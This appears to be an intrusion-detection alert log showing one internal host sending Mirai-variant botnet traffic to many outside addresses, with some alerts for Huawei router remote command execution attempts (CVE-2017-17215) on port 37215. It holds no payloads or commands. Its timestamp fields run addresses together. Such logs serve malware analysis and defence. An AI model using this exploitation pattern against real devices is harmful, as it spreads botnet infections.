Timestamp:	192.168.2.2395.85.185.23446426802839471 11/22/23-08:39:59.409615
SID:	2839471
Source Port:	46426
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) - Source IP: 192.168.2.23 - Destination IP: 41.42.152.140

Timestamp:	192.168.2.2341.42.152.14033446372152829579 11/22/23-08:40:09.100084
SID:	2829579
Source Port:	33446
Destination Port:	37215
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.121.162.22

Timestamp:	192.168.2.23112.121.162.2248390802839471 11/22/23-08:39:23.287925
SID:	2839471
Source Port:	48390
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.221.138.145

Timestamp:	192.168.2.2388.221.138.14535592802839471 11/22/23-08:39:18.935087
SID:	2839471
Source Port:	35592
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.221.192.48

Timestamp:	192.168.2.2388.221.192.4853890802839471 11/22/23-08:38:15.210866
SID:	2839471
Source Port:	53890
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.59.110.213

Timestamp:	192.168.2.2395.59.110.21342638802839471 11/22/23-08:38:41.087288
SID:	2839471
Source Port:	42638
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.100.190.29

Timestamp:	192.168.2.2395.100.190.2934720802839471 11/22/23-08:38:08.863832
SID:	2839471
Source Port:	34720
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.198.130.88

Timestamp:	192.168.2.2388.198.130.8835954802839471 11/22/23-08:38:38.655456
SID:	2839471
Source Port:	35954
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.57.104.200

Timestamp:	192.168.2.2395.57.104.20036412802839471 11/22/23-08:39:59.188286
SID:	2839471
Source Port:	36412
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.3.95.152

Timestamp:	192.168.2.2388.3.95.15232788802839471 11/22/23-08:38:50.250924
SID:	2839471
Source Port:	32788
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.174.100.192

Timestamp:	192.168.2.2395.174.100.19246132802839471 11/22/23-08:39:06.570944
SID:	2839471
Source Port:	46132
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.100.34.118

Timestamp:	192.168.2.2395.100.34.11847050802839471 11/22/23-08:40:30.413516
SID:	2839471
Source Port:	47050
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.164.11.209

Timestamp:	192.168.2.2395.164.11.20939486802839471 11/22/23-08:39:49.927590
SID:	2839471
Source Port:	39486
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.30.213.56

Timestamp:	192.168.2.23112.30.213.5656140802839471 11/22/23-08:38:47.952245
SID:	2839471
Source Port:	56140
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.99.177.12

Timestamp:	192.168.2.2388.99.177.1251482802839471 11/22/23-08:39:18.940078
SID:	2839471
Source Port:	51482
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.100.139.78

Timestamp:	192.168.2.2395.100.139.7858242802839471 11/22/23-08:38:32.451423
SID:	2839471
Source Port:	58242
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.99.14.70

Timestamp:	192.168.2.2388.99.14.7049472802839471 11/22/23-08:38:50.250989
SID:	2839471
Source Port:	49472
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.85.214.113

Timestamp:	192.168.2.2395.85.214.11351698802839471 11/22/23-08:38:35.641496
SID:	2839471
Source Port:	51698
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.49.9.224

Timestamp:	192.168.2.23112.49.9.22438274802839471 11/22/23-08:38:57.534063
SID:	2839471
Source Port:	38274
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.101.95.27

Timestamp:	192.168.2.2395.101.95.2734196802839471 11/22/23-08:39:40.881182
SID:	2839471
Source Port:	34196
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.153.38.14

Timestamp:	192.168.2.2395.153.38.1434780802839471 11/22/23-08:39:59.838473
SID:	2839471
Source Port:	34780
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.210.17.83

Timestamp:	192.168.2.2388.210.17.8355668802839471 11/22/23-08:39:20.517145
SID:	2839471
Source Port:	55668
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.129.109.55

Timestamp:	192.168.2.2388.129.109.5546502802839471 11/22/23-08:39:29.795993
SID:	2839471
Source Port:	46502
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.214.59.197

Timestamp:	192.168.2.2395.214.59.19747398802839471 11/22/23-08:38:58.796445
SID:	2839471
Source Port:	47398
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.100.150.46

Timestamp:	192.168.2.2395.100.150.4647846802839471 11/22/23-08:39:23.475977
SID:	2839471
Source Port:	47846
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.134.9.177

Timestamp:	192.168.2.2395.134.9.17738718802839471 11/22/23-08:38:24.778573
SID:	2839471
Source Port:	38718
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.181.228.150

Timestamp:	192.168.2.2395.181.228.15049892802839471 11/22/23-08:38:45.911212
SID:	2839471
Source Port:	49892
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.130.227.43

Timestamp:	192.168.2.2395.130.227.4353112802839471 11/22/23-08:38:58.172584
SID:	2839471
Source Port:	53112
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.217.192.10

Timestamp:	192.168.2.2395.217.192.1038092802839471 11/22/23-08:38:19.602811
SID:	2839471
Source Port:	38092
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.104.86.79

Timestamp:	192.168.2.2395.104.86.7952876802839471 11/22/23-08:39:55.277489
SID:	2839471
Source Port:	52876
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.99.2.44

Timestamp:	192.168.2.2388.99.2.4444682802839471 11/22/23-08:39:09.902001
SID:	2839471
Source Port:	44682
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.99.93.22

Timestamp:	192.168.2.2388.99.93.2259478802839471 11/22/23-08:40:06.938090
SID:	2839471
Source Port:	59478
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.85.110.220

Timestamp:	192.168.2.2395.85.110.22043998802839471 11/22/23-08:40:06.749263
SID:	2839471
Source Port:	43998
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.74.89.42

Timestamp:	192.168.2.23112.74.89.4252462802839471 11/22/23-08:40:15.687197
SID:	2839471
Source Port:	52462
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.125.198.43

Timestamp:	192.168.2.23112.125.198.4350828802839471 11/22/23-08:40:21.332828
SID:	2839471
Source Port:	50828
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.217.53.65

Timestamp:	192.168.2.2395.217.53.6533556802839471 11/22/23-08:38:42.834352
SID:	2839471
Source Port:	33556
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.86.103.208

Timestamp:	192.168.2.2395.86.103.20841578802839471 11/22/23-08:38:32.471725
SID:	2839471
Source Port:	41578
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.110.209.71

Timestamp:	192.168.2.2395.110.209.7154920802839471 11/22/23-08:38:40.952261
SID:	2839471
Source Port:	54920
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.85.185.234

Timestamp:	192.168.2.2395.85.185.23446922802839471 11/22/23-08:40:13.905119
SID:	2839471
Source Port:	46922
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.216.154.131

Timestamp:	192.168.2.2395.216.154.13148138802839471 11/22/23-08:39:09.715103
SID:	2839471
Source Port:	48138
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.100.77.205

Timestamp:	192.168.2.2395.100.77.20539866802839471 11/22/23-08:38:58.776242
SID:	2839471
Source Port:	39866
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.196.16.137

Timestamp:	192.168.2.23112.196.16.13741498802839471 11/22/23-08:38:48.314603
SID:	2839471
Source Port:	41498
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.48.136.70

Timestamp:	192.168.2.23112.48.136.7050186802839471 11/22/23-08:39:59.558274
SID:	2839471
Source Port:	50186
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) - Source IP: 192.168.2.23 - Destination IP: 41.42.157.24

Timestamp:	192.168.2.2341.42.157.2449582372152829579 11/22/23-08:38:57.907901
SID:	2829579
Source Port:	49582
Destination Port:	37215
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.217.2.155

Timestamp:	192.168.2.2395.217.2.15548740802839471 11/22/23-08:38:28.333749
SID:	2839471
Source Port:	48740
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.100.139.78

Timestamp:	192.168.2.2395.100.139.7858132802839471 11/22/23-08:38:28.138683
SID:	2839471
Source Port:	58132
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.204.201.42

Timestamp:	192.168.2.2388.204.201.4252576802839471 11/22/23-08:40:24.948792
SID:	2839471
Source Port:	52576
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) - Source IP: 192.168.2.23 - Destination IP: 41.42.81.189

Timestamp:	192.168.2.2341.42.81.18935538372152829579 11/22/23-08:40:01.779235
SID:	2829579
Source Port:	35538
Destination Port:	37215
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.221.130.250

Timestamp:	192.168.2.2388.221.130.25044532802839471 11/22/23-08:39:26.840314
SID:	2839471
Source Port:	44532
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.197.176.131

Timestamp:	192.168.2.2395.197.176.13152262802839471 11/22/23-08:39:06.548296
SID:	2839471
Source Port:	52262
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.100.76.133

Timestamp:	192.168.2.2395.100.76.13347808802839471 11/22/23-08:38:58.057555
SID:	2839471
Source Port:	47808
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.101.247.189

Timestamp:	192.168.2.2395.101.247.18943618802839471 11/22/23-08:37:53.327357
SID:	2839471
Source Port:	43618
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) - Source IP: 192.168.2.23 - Destination IP: 197.56.131.176

Timestamp:	192.168.2.23197.56.131.17635542372152835222 11/22/23-08:39:23.590260
SID:	2835222
Source Port:	35542
Destination Port:	37215
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.244.239.228

Timestamp:	192.168.2.2395.244.239.22843538802839471 11/22/23-08:38:58.788368
SID:	2839471
Source Port:	43538
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.31.197.19

Timestamp:	192.168.2.2395.31.197.1939706802839471 11/22/23-08:38:42.895599
SID:	2839471
Source Port:	39706
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.125.213.26

Timestamp:	192.168.2.23112.125.213.2634836802839471 11/22/23-08:38:11.688359
SID:	2839471
Source Port:	34836
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.86.66.8

Timestamp:	192.168.2.2395.86.66.855812802839471 11/22/23-08:38:25.027667
SID:	2839471
Source Port:	55812
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.65.80.241

Timestamp:	192.168.2.2395.65.80.24144676802839471 11/22/23-08:40:10.705723
SID:	2839471
Source Port:	44676
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.208.215.246

Timestamp:	192.168.2.2388.208.215.24641694802839471 11/22/23-08:38:38.643857
SID:	2839471
Source Port:	41694
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.137.39.70

Timestamp:	192.168.2.23112.137.39.7043350802839471 11/22/23-08:39:12.368004
SID:	2839471
Source Port:	43350
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.217.58.34

Timestamp:	192.168.2.2395.217.58.3437360802839471 11/22/23-08:40:10.679992
SID:	2839471
Source Port:	37360
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.183.36.137

Timestamp:	192.168.2.2395.183.36.13751582802839471 11/22/23-08:38:17.584780
SID:	2839471
Source Port:	51582
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.99.142.90

Timestamp:	192.168.2.2388.99.142.9058568802839471 11/22/23-08:38:26.460926
SID:	2839471
Source Port:	58568
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.101.146.136

Timestamp:	192.168.2.2395.101.146.13633076802839471 11/22/23-08:38:40.849760
SID:	2839471
Source Port:	33076
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.126.173.128

Timestamp:	192.168.2.23112.126.173.12843370802839471 11/22/23-08:39:01.453138
SID:	2839471
Source Port:	43370
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.129.23.80

Timestamp:	192.168.2.2395.129.23.8032976802839471 11/22/23-08:39:26.112226
SID:	2839471
Source Port:	32976
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.28.221.212

Timestamp:	192.168.2.23112.28.221.21259214802839471 11/22/23-08:38:48.314824
SID:	2839471
Source Port:	59214
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.107.4.56

Timestamp:	192.168.2.2395.107.4.5658114802839471 11/22/23-08:40:27.031046
SID:	2839471
Source Port:	58114
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.217.121.167

Timestamp:	192.168.2.2395.217.121.16738840802839471 11/22/23-08:39:46.060439
SID:	2839471
Source Port:	38840
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.80.31.56

Timestamp:	192.168.2.2395.80.31.5639272802839471 11/22/23-08:39:54.929554
SID:	2839471
Source Port:	39272
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.216.140.98

Timestamp:	192.168.2.2395.216.140.9844060802839471 11/22/23-08:40:24.481678
SID:	2839471
Source Port:	44060
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.126.102.82

Timestamp:	192.168.2.23112.126.102.8245378802839471 11/22/23-08:39:18.805115
SID:	2839471
Source Port:	45378
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.100.224.246

Timestamp:	192.168.2.2395.100.224.24653398802839471 11/22/23-08:37:53.331912
SID:	2839471
Source Port:	53398
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.197.122.90

Timestamp:	192.168.2.23112.197.122.9054994802839471 11/22/23-08:39:09.591904
SID:	2839471
Source Port:	54994
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.126.235.90

Timestamp:	192.168.2.23112.126.235.9042768802839471 11/22/23-08:39:29.396836
SID:	2839471
Source Port:	42768
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.101.242.183

Timestamp:	192.168.2.2395.101.242.18349194802839471 11/22/23-08:40:04.676583
SID:	2839471
Source Port:	49194
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.221.127.4

Timestamp:	192.168.2.2388.221.127.438348802839471 11/22/23-08:40:14.089061
SID:	2839471
Source Port:	38348
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.12.59.124

Timestamp:	192.168.2.2388.12.59.12453814802839471 11/22/23-08:40:12.481780
SID:	2839471
Source Port:	53814
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.107.233.10

Timestamp:	192.168.2.2395.107.233.1049470802839471 11/22/23-08:37:50.644356
SID:	2839471
Source Port:	49470
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.220.219.105

Timestamp:	192.168.2.2395.220.219.10542150802839471 11/22/23-08:40:27.026172
SID:	2839471
Source Port:	42150
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.184.162.161

Timestamp:	192.168.2.23112.184.162.16140052802839471 11/22/23-08:39:18.751143
SID:	2839471
Source Port:	40052
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.97.116.146

Timestamp:	192.168.2.2395.97.116.14658852802839471 11/22/23-08:40:21.534185
SID:	2839471
Source Port:	58852
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.176.165.16

Timestamp:	192.168.2.23112.176.165.1655754802839471 11/22/23-08:38:46.205746
SID:	2839471
Source Port:	55754
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.181.216.80

Timestamp:	192.168.2.2395.181.216.8060068802839471 11/22/23-08:38:45.358062
SID:	2839471
Source Port:	60068
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.221.205.146

Timestamp:	192.168.2.2388.221.205.14648916802839471 11/22/23-08:38:26.481084
SID:	2839471
Source Port:	48916
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.215.241.39

Timestamp:	192.168.2.2395.215.241.3959496802839471 11/22/23-08:40:28.945103
SID:	2839471
Source Port:	59496
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.175.23.228

Timestamp:	192.168.2.2395.175.23.22836152802839471 11/22/23-08:38:26.713988
SID:	2839471
Source Port:	36152
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.127.51.183

Timestamp:	192.168.2.23112.127.51.18341168802839471 11/22/23-08:39:40.672184
SID:	2839471
Source Port:	41168
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.216.103.91

Timestamp:	192.168.2.2395.216.103.9151076802839471 11/22/23-08:38:58.787917
SID:	2839471
Source Port:	51076
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) - Source IP: 192.168.2.23 - Destination IP: 41.45.28.255

Timestamp:	192.168.2.2341.45.28.25546578372152835222 11/22/23-08:39:28.880184
SID:	2835222
Source Port:	46578
Destination Port:	37215
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.198.184.162

Timestamp:	192.168.2.2388.198.184.16249680802839471 11/22/23-08:40:24.670382
SID:	2839471
Source Port:	49680
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.198.112.81

Timestamp:	192.168.2.2388.198.112.8145660802839471 11/22/23-08:38:50.628487
SID:	2839471
Source Port:	45660
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.101.197.201

Timestamp:	192.168.2.2395.101.197.20134432802839471 11/22/23-08:40:18.583344
SID:	2839471
Source Port:	34432
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.221.47.73

Timestamp:	192.168.2.2388.221.47.7355186802839471 11/22/23-08:39:29.601718
SID:	2839471
Source Port:	55186
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.125.237.78

Timestamp:	192.168.2.23112.125.237.7852558802839471 11/22/23-08:40:09.539595
SID:	2839471
Source Port:	52558
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.213.95.153

Timestamp:	192.168.2.23112.213.95.15357416802839471 11/22/23-08:39:12.928632
SID:	2839471
Source Port:	57416
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.47.36.34

Timestamp:	192.168.2.2388.47.36.3441260802839471 11/22/23-08:40:28.513564
SID:	2839471
Source Port:	41260
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.100.188.177

Timestamp:	192.168.2.2395.100.188.17760070802839471 11/22/23-08:40:27.060501
SID:	2839471
Source Port:	60070
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) - Source IP: 192.168.2.23 - Destination IP: 197.224.204.222

Timestamp:	192.168.2.23197.224.204.22249476372152835222 11/22/23-08:39:47.427391
SID:	2835222
Source Port:	49476
Destination Port:	37215
Protocol:	TCP
Classtype:	A Network Trojan was detected

